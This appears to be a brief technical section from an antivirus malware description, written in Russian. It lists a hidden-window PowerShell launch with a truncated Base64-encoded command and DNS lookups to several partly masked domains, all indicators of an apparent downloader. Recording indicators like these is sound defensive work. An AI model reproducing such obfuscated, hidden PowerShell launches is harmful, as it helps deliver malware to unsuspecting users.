Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABkAGUAcABvAHMAaQB0AG8AbgBpAD0AJwBTAHAAcgBpAG4AZwBzAHoAZgB1ACcAOwAkAGEAdQB4AGkAbABpAGEAcgB5AHcAaQByACAAPQAgACcAMwAyADEAJwA7ACQAcgBlAGQAaQBvAGQAPQAnAFMAbwBmAHQAcABtAGoAJwA7ACQAWQBlAG0AZQB...
- DNS ASK bi####ulambach.com
- DNS ASK ci####pokkisham.com
- DNS ASK bl##.#inimap.net
- DNS ASK ar#######tems.bubaglobal.com
- DNS ASK co#######ot.laroquebrunoise.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABkAGUAcABvAHMAaQB0AG8AbgBpAD0AJwBTAHAAcgBpAG4AZwBzAHoAZgB1ACcAOwAkAGEAdQB4AGkAbABpAGEAcgB5AHcAaQByACAAPQAgACcAMwAyADEAJwA7ACQAcgBlAGQAaQBvAGQAPQAnAFMAbwBmAHQAcABtAGoAJwA7ACQAWQBlAG0AZQB...' (со скрытым окном)